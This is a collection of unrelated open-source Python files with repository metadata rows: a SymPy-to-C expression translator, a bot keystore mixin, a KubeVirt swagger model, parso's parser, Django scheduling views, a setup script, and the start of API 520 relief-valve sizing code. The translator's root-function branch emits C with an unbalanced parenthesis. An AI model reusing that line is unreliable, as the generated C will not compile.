return "rt_atanh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CEILING
elif tree.func == SympyCeiling:
return "rt_ceil(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COS
elif tree.func == SympyCos:
return "rt_cos(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COSH
elif tree.func == SympyCosh:
return "rt_cosh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COT
elif tree.func == SympyCot:
return "rt_cot(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_COTH
elif tree.func == SympyCoth:
return "rt_coth(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_CSC
elif tree.func == SympyCsc:
return "rt_csc(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_DELAY
#TODO
#SEE BELOW !
# AST_FUNCTION_EXP
elif tree.func == SympyExp:
return "rt_exp(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FACTORIAL
elif tree.func == SympyFactorial:
return "rt_factorial(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_FLOOR
elif tree.func == SympyFloor:
return "rt_floor(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_LOG
elif tree.func == SympyLog:
if len(tree.args) == 2:
return "(rt_log(%s)/rt_log(%s))" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
else:
return "rt_log(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyPiecewise:
(t_val, t_cond) = tree.args[0]
line = "(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = ")"
for piece in range(1, len(tree.args)):
(t_val, t_cond) = tree.args[piece]
line = line + ":(%s?%s" % (self.translateForC(t_cond), self.translateForC(t_val))
line_end = line_end + ")"
line = line + ":(RCONST(0.0))" + line_end
return line
# AST_FUNCTION_PIECEWISE
elif tree.func == SympyITE:
t_cond = tree.args[0]
t_val = tree.args[1]
t_other_val = tree.args[2]
line = "(%s?%s:%s)" % (self.translateForC(t_cond), self.translateForC(t_val), self.translateForC(t_other_val))
return line
# AST_FUNCTION_POWER
elif tree.func == SympyPow:
if len(tree.args) == 2 and tree.args[1].func == SympyNegOne:
return "RCONST(1.0)/(%s)" % self.translateForC(tree.args[0])
return "rt_pow(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_ROOT
elif tree.func == SympyRoot:
return "rt_pow(%s,(RCONST(1.0)/%s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
# AST_FUNCTION_SEC
elif tree.func == SympySec:
return "rt_sec(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SIN
elif tree.func == SympySin:
return "rt_sin(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_SINH
elif tree.func == SympySinh:
return "rt_sinh(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TAN
elif tree.func == SympyTan:
return "rt_tan(%s)" % self.translateForC(tree.args[0])
# AST_FUNCTION_TANH
elif tree.func == SympyTanh:
return "rt_tanh(%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyEqual:
return "rt_eq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyUnequal:
return "rt_neq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyGreaterThan:
return "rt_geq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyLessThan:
return "rt_leq(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictGreaterThan:
return "rt_gt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyStrictLessThan:
return "rt_lt(%s, %s)" % (self.translateForC(tree.args[0]), self.translateForC(tree.args[1]))
elif tree.func == SympyAnd:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " && "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyOr:
t_args = "("
for i_arg in range(0, len(tree.args)):
if i_arg > 0:
t_args = t_args + " || "
t_args = t_args + self.translateForC(tree.args[i_arg])
return t_args + ")"
elif tree.func == SympyXor:
return self.translateForC(simplify(tree))
elif tree.func == SympyNot:
return "(!%s)" % self.translateForC(tree.args[0])
elif tree.func == SympyImplies:
# p -> q == !p || q
# print srepr(tree)
# print tree.evalf()
return "(!" + self.translateForC(tree.args[0]) + " || " + self.translateForC(tree.args[1]) + ")"
elif tree.func == SympyUnevaluatedMin:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
elif len(tree.args) > 1:
str = "min(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
for i, arg in enumerate(tree.args):
if i > 1:
str = "min(" + str + ", " + self.translateForC(tree.args[i]) + ")"
return str
elif tree.func == SympyUnevaluatedMax:
if len(tree.args) == 1:
return self.translateForC(tree.args[0])
elif len(tree.args) > 1:
str = "max(" + self.translateForC(tree.args[0]) + ", " + self.translateForC(tree.args[1]) + ")"
for i, arg in enumerate(tree.args):
if i > 1:
str = "max(" + str + ", " + self.translateForC(tree.args[i]) + ")"
return str
elif tree.func == SympyFunction:
raise DelayNotImplemented()
else:
raise MathException("C Math Writer : Unknown Sympy Symbol %s" % str(tree))
return str(tree)
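# Illustrative sketch (assumes a model instance as required by the constructor;
# the name `model` is hypothetical): plain Python numbers are wrapped in RCONST,
# >>> CMathWriter(model).translateForC(2.5)
# 'RCONST(2.5)'
# while model variables resolve to Ith(y, i)/Ith(ass, i)/Ith(cst, i) references
# through translateVariableForC.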
|
gpl-3.0
| -8,722,728,192,466,864,000
| 25.868922
| 113
| 0.634354
| false
| 2.681224
| false
| false
| false
|
Watchful1/RedditSubsBot
|
src/database/_keystore.py
|
1
|
1342
|
import discord_logging
import utils
from classes.key_value import KeyValue
log = discord_logging.get_logger()
class _DatabaseKeystore:
def __init__(self):
self.session = self.session # for pycharm linting
self.log_debug = self.log_debug
def save_keystore(self, key, value):
if self.log_debug:
log.debug(f"Saving keystore: {key} : {value}")
self.session.merge(KeyValue(key, value))
def get_keystore(self, key):
if self.log_debug:
log.debug(f"Fetching keystore: {key}")
key_value = self.session.query(KeyValue).filter_by(key=key).first()
if key_value is None:
if self.log_debug:
log.debug("Key not found")
return None
if self.log_debug:
log.debug(f"Value: {key_value.value}")
return key_value.value
def save_datetime(self, key, date_time):
self.save_keystore(key, utils.get_datetime_string(date_time))
def get_datetime(self, key, is_date=False):
result = self.get_keystore(key)
if result is None:
return None
else:
result_date = utils.parse_datetime_string(result)
if is_date:
return result_date.date()
else:
return result_date
def get_or_init_datetime(self, key):
result = self.get_datetime(key)
if result is None:
log.warning(f"Initializing key {key} to now")
now = utils.datetime_now()
self.save_datetime(key, now)
return now
return result
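# Hypothetical usage sketch (the name `db` is illustrative; this class is a
# mixin that expects self.session and self.log_debug from the composed
# database object):
# >>> db.save_datetime("last_run", utils.datetime_now())
# >>> db.get_datetime("last_run")  # parsed back into a datetime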
|
mit
| -628,551,014,755,818,100
| 23.851852
| 69
| 0.695976
| false
| 2.879828
| false
| false
| false
|
kubevirt/client-python
|
kubevirt/models/v1beta1_data_volume_blank_image.py
|
1
|
2409
|
# coding: utf-8
"""
KubeVirt API
This is the KubeVirt API, an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: kubevirt-dev@googlegroups.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1DataVolumeBlankImage(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self):
"""
V1beta1DataVolumeBlankImage - a model defined in Swagger
"""
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1DataVolumeBlankImage):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
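# Illustrative: with no declared swagger attributes, an instance of this model
# serializes to an empty dict.
# >>> V1beta1DataVolumeBlankImage().to_dict()
# {}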
|
apache-2.0
| -3,823,461,405,543,961,600
| 23.333333
| 77
| 0.514321
| false
| 4.404022
| false
| false
| false
|
lmregus/Portfolio
|
python/design_patterns/env/lib/python3.7/site-packages/parso/python/parser.py
|
1
|
8593
|
from parso.python import tree
from parso.python.token import PythonTokenTypes
from parso.parser import BaseParser
NAME = PythonTokenTypes.NAME
INDENT = PythonTokenTypes.INDENT
DEDENT = PythonTokenTypes.DEDENT
class Parser(BaseParser):
"""
This class is used to parse a Python file; it then divides it into a
class structure of different scopes.
:param pgen_grammar: The grammar object of pgen2. Loaded by load_grammar.
"""
node_map = {
'expr_stmt': tree.ExprStmt,
'classdef': tree.Class,
'funcdef': tree.Function,
'file_input': tree.Module,
'import_name': tree.ImportName,
'import_from': tree.ImportFrom,
'break_stmt': tree.KeywordStatement,
'continue_stmt': tree.KeywordStatement,
'return_stmt': tree.ReturnStmt,
'raise_stmt': tree.KeywordStatement,
'yield_expr': tree.YieldExpr,
'del_stmt': tree.KeywordStatement,
'pass_stmt': tree.KeywordStatement,
'global_stmt': tree.GlobalStmt,
'nonlocal_stmt': tree.KeywordStatement,
'print_stmt': tree.KeywordStatement,
'assert_stmt': tree.AssertStmt,
'if_stmt': tree.IfStmt,
'with_stmt': tree.WithStmt,
'for_stmt': tree.ForStmt,
'while_stmt': tree.WhileStmt,
'try_stmt': tree.TryStmt,
'comp_for': tree.CompFor,
# Not sure if this is the best idea, but IMO it's the easiest way to
# avoid extreme amounts of work around the subtle difference of 2/3
# grammar in list comprehensions.
'list_for': tree.CompFor,
# Same here. This just exists in Python 2.6.
'gen_for': tree.CompFor,
'decorator': tree.Decorator,
'lambdef': tree.Lambda,
'old_lambdef': tree.Lambda,
'lambdef_nocond': tree.Lambda,
}
default_node = tree.PythonNode
# Names/Keywords are handled separately
_leaf_map = {
PythonTokenTypes.STRING: tree.String,
PythonTokenTypes.NUMBER: tree.Number,
PythonTokenTypes.NEWLINE: tree.Newline,
PythonTokenTypes.ENDMARKER: tree.EndMarker,
PythonTokenTypes.FSTRING_STRING: tree.FStringString,
PythonTokenTypes.FSTRING_START: tree.FStringStart,
PythonTokenTypes.FSTRING_END: tree.FStringEnd,
}
def __init__(self, pgen_grammar, error_recovery=True, start_nonterminal='file_input'):
super(Parser, self).__init__(pgen_grammar, start_nonterminal,
error_recovery=error_recovery)
self.syntax_errors = []
self._omit_dedent_list = []
self._indent_counter = 0
def parse(self, tokens):
if self._error_recovery:
if self._start_nonterminal != 'file_input':
raise NotImplementedError
tokens = self._recovery_tokenize(tokens)
return super(Parser, self).parse(tokens)
def convert_node(self, nonterminal, children):
"""
Convert raw node information to a PythonBaseNode instance.
This is passed to the parser driver which calls it whenever a reduction of a
grammar rule produces a new complete node, so that the tree is built
strictly bottom-up.
"""
try:
node = self.node_map[nonterminal](children)
except KeyError:
if nonterminal == 'suite':
# We don't want the INDENT/DEDENT in our parser tree. Those
# leaves are just cancer. They are virtual leaves and not real
# ones and therefore have pseudo start/end positions and no
# prefixes. Just ignore them.
children = [children[0]] + children[2:-1]
elif nonterminal == 'list_if':
# Make transitioning from 2 to 3 easier.
nonterminal = 'comp_if'
elif nonterminal == 'listmaker':
# Same as list_if above.
nonterminal = 'testlist_comp'
node = self.default_node(nonterminal, children)
for c in children:
c.parent = node
return node
def convert_leaf(self, type, value, prefix, start_pos):
# print('leaf', repr(value), token.tok_name[type])
if type == NAME:
if value in self._pgen_grammar.reserved_syntax_strings:
return tree.Keyword(value, start_pos, prefix)
else:
return tree.Name(value, start_pos, prefix)
return self._leaf_map.get(type, tree.Operator)(value, start_pos, prefix)
def error_recovery(self, token):
tos_nodes = self.stack[-1].nodes
if tos_nodes:
last_leaf = tos_nodes[-1].get_last_leaf()
else:
last_leaf = None
if self._start_nonterminal == 'file_input' and \
(token.type == PythonTokenTypes.ENDMARKER
or token.type == DEDENT and '\n' not in last_leaf.value
and '\r' not in last_leaf.value):
# In Python statements need to end with a newline. But since it's
# possible (and valid in Python) that there's no newline at the
# end of a file, we have to recover even if the user doesn't want
# error recovery.
if self.stack[-1].dfa.from_rule == 'simple_stmt':
try:
plan = self.stack[-1].dfa.transitions[PythonTokenTypes.NEWLINE]
except KeyError:
pass
else:
if plan.next_dfa.is_final and not plan.dfa_pushes:
# We are ignoring here that the newline would be
# required for a simple_stmt.
self.stack[-1].dfa = plan.next_dfa
self._add_token(token)
return
if not self._error_recovery:
return super(Parser, self).error_recovery(token)
def current_suite(stack):
# For now just discard everything that is not a suite or
# file_input, if we detect an error.
for until_index, stack_node in reversed(list(enumerate(stack))):
# `suite` can sometimes be only simple_stmt, not stmt.
if stack_node.nonterminal == 'file_input':
break
elif stack_node.nonterminal == 'suite':
# In the case where we just have a newline we don't want to
# do error recovery here. In all other cases, we want to do
# error recovery.
if len(stack_node.nodes) != 1:
break
return until_index
until_index = current_suite(self.stack)
if self._stack_removal(until_index + 1):
self._add_token(token)
else:
typ, value, start_pos, prefix = token
if typ == INDENT:
# For every deleted INDENT we have to delete a DEDENT as well.
# Otherwise the parser will get into trouble and DEDENT too early.
self._omit_dedent_list.append(self._indent_counter)
error_leaf = tree.PythonErrorLeaf(typ.name, value, start_pos, prefix)
self.stack[-1].nodes.append(error_leaf)
tos = self.stack[-1]
if tos.nonterminal == 'suite':
# Need at least one statement in the suite. This happened with the
# error recovery above.
try:
tos.dfa = tos.dfa.arcs['stmt']
except KeyError:
# We're already in a final state.
pass
def _stack_removal(self, start_index):
all_nodes = [node for stack_node in self.stack[start_index:] for node in stack_node.nodes]
if all_nodes:
node = tree.PythonErrorNode(all_nodes)
for n in all_nodes:
n.parent = node
self.stack[start_index - 1].nodes.append(node)
self.stack[start_index:] = []
return bool(all_nodes)
def _recovery_tokenize(self, tokens):
for token in tokens:
typ = token[0]
if typ == DEDENT:
# We need to count indents, because if we just omit any DEDENT,
# we might omit them in the wrong place.
o = self._omit_dedent_list
if o and o[-1] == self._indent_counter:
o.pop()
continue
self._indent_counter -= 1
elif typ == INDENT:
self._indent_counter += 1
yield token
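# Hedged usage sketch: this Parser is normally driven through the public parso
# API rather than instantiated directly, e.g.
# >>> import parso
# >>> tree = parso.parse("x = 1\n")
# >>> tree.get_code()
# 'x = 1\n'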
|
mit
| 5,602,873,020,152,564,000
| 38.417431
| 98
| 0.56837
| false
| 4.210191
| false
| false
| false
|
migonzalvar/mfs2011-practicum-saas
|
webclient/agenda/views.py
|
1
|
5663
|
import datetime
import time
from django.http import Http404, HttpResponse
from django.shortcuts import render_to_response, redirect
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.utils.translation import ugettext as _
from django.views.generic import TemplateView
from django.utils.timezone import utc, get_current_timezone
import socket
import requests
import pytz
from forms import ShiftForm, AppointmentForm, QuickAppointmentForm
from server_models import (Shift, Appointment, Slot, datetime_to_dtstring,
DEFAULT_SLOT_LENGTH, TIMEFORMAT, FIELD_SEPARATOR)
# API helpers
def str_to_datetime(str_date, str_time):
"""Converts a local date and a time strings into datetime UTC."""
tz = get_current_timezone()
isostring_naive_local = str_date + "T" + str_time
dt_naive_local = datetime.datetime.strptime(isostring_naive_local, "%Y-%m-%dT%H:%M")
dt_aware_local = tz.localize(dt_naive_local)
dt_aware_utc = dt_aware_local.astimezone(utc)
return dt_aware_utc
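# Illustrative example (the exact result depends on the configured Django
# time zone; Europe/Madrid, UTC+2 in May, is assumed here):
# >>> str_to_datetime("2012-05-01", "09:30")
# datetime.datetime(2012, 5, 1, 7, 30, tzinfo=<UTC>)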
# Actual views
def index(request):
data_dict = dict(version=1)
return render_to_response('agenda/index.html', data_dict,
context_instance=RequestContext(request))
class ResourceView(TemplateView):
def get_context_data(self, **kwargs):
context = super(ResourceView, self).get_context_data(**kwargs)
context[self.resource] = list(self.Model.all())
return context
def get(self, request, *args, **kwargs):
context = self.get_context_data(**kwargs)
context["form"] = self.Form()
return self.render_to_response(context)
def post(self, request, *args, **kwargs):
if request.POST.get("method", "") == "delete":
return self.pseudodelete(request, *args, **kwargs)
form = self.Form(request.POST)
if form.is_valid():
d = self.prepare_form_data(form)
resource = self.SaveModel(**d)
resource.save()
messages.success(request,
_('Resource %(id)s saved.') % {"id": resource.id})
redirect_url = request.POST.get("redirect", reverse(self.resource))
return redirect(redirect_url)
else:
messages.error(request, "Error validating data: %s" % repr(form))
context = self.get_context_data(**kwargs)
context["form"] = form
return self.render_to_response(context)
def pseudodelete(self, request, *args, **kwargs):
context = self.get_context_data(**kwargs)
oid = request.POST.get("id", None)
try:
resource = self.Model.delete_id(oid)
except self.Model.DoesNotExist:
raise Http404
messages.success(request,
_('Resource %(id)s deleted.') % {"id": oid})
return redirect(reverse(self.resource))
def prepare_form_data(self, form):
raise NotImplementedError
class ShiftView(ResourceView):
resource = "shifts"
Model = Shift
Form = ShiftForm
SaveModel = Shift
template_name = 'agenda/shifts.html'
def prepare_form_data(self, form):
date = form.cleaned_data["date"]
start = str_to_datetime(date, form.cleaned_data["start"])
end = str_to_datetime(date, form.cleaned_data["end"])
return {FIELD_SEPARATOR.join(("start", "datetime")): start,
FIELD_SEPARATOR.join(("end", "datetime")): end}
class AppointmentView(ResourceView):
resource = "appointments"
Model = Appointment
Form = AppointmentForm
SaveModel = Appointment
template_name = 'agenda/appointments.html'
def prepare_form_data(self, form):
date = form.cleaned_data["date"]
start = str_to_datetime(date, form.cleaned_data["start"])
end = str_to_datetime(date, form.cleaned_data["end"])
return {
FIELD_SEPARATOR.join(("start", "datetime")): start,
FIELD_SEPARATOR.join(("end", "datetime")): end}
class SlotView(ResourceView):
resource = "freeslots"
Model = Slot
Form = QuickAppointmentForm
SaveModel = Appointment
template_name = "agenda/slots.html"
def get_context_data(self, **kwargs):
context = super(ResourceView, self).get_context_data(**kwargs)
try:
year = int(kwargs['year'])
month = int(kwargs['month'])
day = int(kwargs['day'])
basedate = datetime.date(year, month, day)
except (KeyError, TypeError, ValueError):
basedate = datetime.date.today()
prev = basedate - datetime.timedelta(days=1)
next = basedate + datetime.timedelta(days=1)
selectdate = [basedate + datetime.timedelta(days=i) for i in range(-1, 7)]
start = datetime.datetime.combine(basedate, datetime.time(0))
end = datetime.datetime.combine(basedate, datetime.time.max)
context["basedate"] = basedate
context["prev"] = prev
context["next"] = next
context["selectdate"] = selectdate
context[self.resource] = self.Model.all(length=DEFAULT_SLOT_LENGTH,
start=datetime_to_dtstring(start),
end=datetime_to_dtstring(end))
return context
def prepare_form_data(self, form):
start = form.cleaned_data["start_dt"].astimezone(utc)
end = form.cleaned_data["end_dt"].astimezone(utc)
return {
FIELD_SEPARATOR.join(("start", "datetime")): start,
FIELD_SEPARATOR.join(("end", "datetime")): end, }
|
isc
| -347,853,227,394,681,300
| 35.535484
| 88
| 0.620696
| false
| 3.962911
| false
| false
| false
|
nexiles/nexiles.gateway.example
|
src/nexiles.gateway.example/setup.py
|
1
|
1111
|
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
version = '0.1.0'
long_description = (read('../../readme.rst'))
setup(name='nexiles.gateway.example',
version=version,
description="A example nexiles|gateway service",
long_description=long_description,
classifiers=[
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
],
keywords='',
author='Stefan Eletzhofer',
author_email='se@nexiles.de',
url='https://github.com/nexiles/nexiles.gateway.example',
license='proprietary',
packages=find_packages('.', exclude=['ez_setup']),
package_dir={'': '.'},
package_data={"nexiles.gateway.example": ["templates/*"]},
namespace_packages=['nexiles', 'nexiles.gateway'],
include_package_data=True,
zip_safe=True,
install_requires=['setuptools',
# 'nexiles.tools>=1.5.0'
],
)
|
bsd-2-clause
| -5,127,291,134,699,237,000
| 29.861111
| 73
| 0.594959
| false
| 3.884615
| false
| false
| false
|
CalebBell/fluids
|
fluids/safety_valve.py
|
1
|
22965
|
# -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains functions for sizing and rating pressure relief valves.
At present, this consists of several functions from API 520.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/fluids/>`_
or contact the author at Caleb.Andrew.Bell@gmail.com.
.. contents:: :local:
Interfaces
----------
.. autofunction:: API520_A_g
.. autofunction:: API520_A_steam
Functions and Data
------------------
.. autofunction:: API520_round_size
.. autofunction:: API520_C
.. autofunction:: API520_F2
.. autofunction:: API520_Kv
.. autofunction:: API520_N
.. autofunction:: API520_SH
.. autofunction:: API520_B
.. autofunction:: API520_W
.. autodata:: API526_letters
.. autodata:: API526_A_sq_inch
.. autodata:: API526_A
"""
from __future__ import division
from math import exp, sqrt
from fluids.constants import psi, inch, atm
from fluids.compressible import is_critical_flow
from fluids.numerics import interp, tck_interp2d_linear, bisplev
__all__ = ['API526_A_sq_inch', 'API526_letters', 'API526_A',
'API520_round_size', 'API520_C', 'API520_F2', 'API520_Kv', 'API520_N',
'API520_SH', 'API520_B', 'API520_W', 'API520_A_g', 'API520_A_steam']
API526_A_sq_inch = [0.110, 0.196, 0.307, 0.503, 0.785, 1.287, 1.838, 2.853, 3.60,
4.34, 6.38, 11.05, 16.00, 26.00] # square inches
'''list: Nominal relief area in for different valve sizes in API 520, [in^2]'''
API526_letters = ['D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R','T']
'''list: Letter size designations for different valve sizes in API 520'''
inch2 = inch*inch
API526_A = [i*inch2 for i in API526_A_sq_inch]
'''list: Nominal relief area in for different valve sizes in API 520, [m^2]'''
del inch2
def API520_round_size(A):
r'''Rounds up the area from an API 520 calculation to an API526 standard
valve area. The returned area is always larger or equal to the input area.
Parameters
----------
A : float
Minimum discharge area [m^2]
Returns
-------
area : float
Actual discharge area [m^2]
Notes
-----
To obtain the letter designation of an input area, lookup the area with
the following:
API526_letters[API526_A.index(area)]
An exception is raised if the required relief area is larger than any of
the API 526 sizes.
Examples
--------
From [1]_, checked with many points on Table 8.
>>> API520_round_size(1E-4)
0.00012645136
>>> API526_letters[API526_A.index(API520_round_size(1E-4))]
'E'
References
----------
.. [1] API Standard 526.
'''
for area in API526_A:
if area >= A:
return area
raise ValueError('Required relief area is larger than can be provided with one valve')
def API520_C(k):
r'''Calculates coefficient C for use in API 520 critical flow relief valve
sizing.
.. math::
C = 0.03948\sqrt{k\left(\frac{2}{k+1}\right)^\frac{k+1}{k-1}}
Parameters
----------
k : float
Isentropic coefficient or ideal gas heat capacity ratio [-]
Returns
-------
C : float
Coefficient `C` [-]
Notes
-----
If C cannot be established, assume a coefficient of 0.0239,
the value at k = 1; this is the lowest possible C and therefore gives the
most conservative (largest) relief area.
Although not dimensional, C varies with the units used.
If k is exactly equal to 1, the expression is undefined, and the formula
must be simplified as follows from an application of L'Hopital's rule.
.. math::
C = 0.03948\sqrt{\frac{1}{e}}
Examples
--------
From [1]_, checked with many points on Table 8.
>>> API520_C(1.35)
0.02669419967057233
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
if k != 1:
return 0.03948*sqrt(k*(2./(k+1.))**((k+1.)/(k-1.)))
else:
return 0.03948*sqrt(1./exp(1))
def API520_F2(k, P1, P2):
r'''Calculates coefficient F2 for subcritical flow for use in API 520
subcritical flow relief valve sizing.
.. math::
F_2 = \sqrt{\left(\frac{k}{k-1}\right)r^\frac{2}{k}
\left[\frac{1-r^\frac{k-1}{k}}{1-r}\right]}
.. math::
r = \frac{P_2}{P_1}
Parameters
----------
k : float
Isentropic coefficient or ideal gas heat capacity ratio [-]
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
P2 : float
Built-up backpressure; the increase in pressure during flow at the
outlet of a pressure-relief device after it opens, [Pa]
Returns
-------
F2 : float
Subcritical flow coefficient `F2` [-]
Notes
-----
F2 is completely dimensionless.
Examples
--------
From [1]_ example 2, matches.
>>> API520_F2(1.8, 1E6, 7E5)
0.8600724121105563
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
r = P2/P1
return sqrt(k/(k-1)*r**(2./k) * ((1-r**((k-1.)/k))/(1.-r)))
def API520_Kv(Re):
r'''Calculates correction due to viscosity for liquid flow for use in
API 520 relief valve sizing.
.. math::
K_v = \left(0.9935 + \frac{2.878}{Re^{0.5}} + \frac{342.75}
{Re^{1.5}}\right)^{-1}
Parameters
----------
Re : float
Reynolds number for flow out the valve [-]
Returns
-------
Kv : float
Correction due to viscosity [-]
Notes
-----
Reynolds number in the standard is defined as follows, with Q in L/min, G1
as specific gravity, mu in centipoise, and area in mm^2:
.. math::
Re = \frac{Q(18800G_1)}{\mu \sqrt{A}}
It is unclear how this expression was derived with a constant of 18800;
the following code demonstrates what the constant should be:
>>> from scipy.constants import *
>>> liter/minute*1000./(0.001*(milli**2)**0.5)
16666.666666666668
Examples
--------
From [1]_, checked with example 5.
>>> API520_Kv(100)
0.6157445891444229
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
return (0.9935 + 2.878/sqrt(Re) + 342.75/Re**1.5)**-1.0
def API520_N(P1):
r'''Calculates correction due to steam pressure for steam flow for use in
API 520 relief valve sizing.
.. math::
K_N = \frac{0.02764P_1-1000}{0.03324P_1-1061}
Parameters
----------
P1 : float
Upstream relieving pressure; the set pressure plus the allowable
overpressure, plus atmospheric pressure, [Pa]
Returns
-------
KN : float
Correction due to steam temperature [-]
Notes
-----
Although not dimensional, KN varies with the units used.
For temperatures above 922 K or pressures above 22057 kPa, KN is not defined.
Internally, units of kPa are used to match the equation in the standard.
Examples
--------
Custom example:
>>> API520_N(1774700)
0.9490406958152466
References
----------
.. [1] API Standard 520, Part 1 - Sizing and Selection.
'''
P1 = P1/1000. # Pa to kPa
return (0.02764*P1-1000.)/(0.03324*P1-1061)
_KSH_psigs = [15, 20, 40, 60, 80, 100, 120, 140, 160, 180, 200, 220, 240, 260,
280, 300, 350, 400, 500, 600, 800, 1000, 1250, 1500, 1750, 2000,
2500, 3000]
_KSH_tempFs = [300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200]
# _KSH_psigs converted from psig to Pa
_KSH_Pa = [204746.3593975254, 239220.14586336722, 377115.29172673443,
515010.4375901016, 652905.5834534689, 790800.7293168361,
928695.8751802032, 1066591.0210435705, 1204486.1669069377,
1342381.312770305, 1480276.4586336722, 1618171.6044970395,
1756066.7503604065, 1893961.8962237737, 2031857.042087141,
2169752.187950508, 2514490.0526089263, 2859227.9172673444,
3548703.64658418, 4238179.375901016, 5617130.834534689,
6996082.29316836, 8719771.616460452, 10443460.939752541,
12167150.263044631, 13890839.58633672, 17338218.232920904,
20785596.879505083]
# _KSH_tempFs converted from F to K
_KSH_tempKs = [422.03888888888889, 477.59444444444443, 533.14999999999998,
588.70555555555552, 644.26111111111106, 699.81666666666661,
755.37222222222226, 810.92777777777769, 866.48333333333335,
922.03888888888889]
_KSH_factors = [[1, 0.98, 0.93, 0.88, 0.84, 0.8, 0.77, 0.74, 0.72, 0.7],
[1, 0.98, 0.93, 0.88, 0.84, 0.8, 0.77, 0.74, 0.72, 0.7],
[1, 0.99, 0.93, 0.88, 0.84, 0.81, 0.77, 0.74, 0.72, 0.7],
[1, 0.99, 0.93, 0.88, 0.84, 0.81, 0.77, 0.75, 0.72, 0.7],
[1, 0.99, 0.93, 0.88, 0.84, 0.81, 0.77, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.84, 0.81, 0.77, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.84, 0.81, 0.78, 0.75, 0.72, 0.7],
[1, 0.99, 0.94, 0.89, 0.85, 0.81, 0.78, 0.75, 0.72, 0.7],
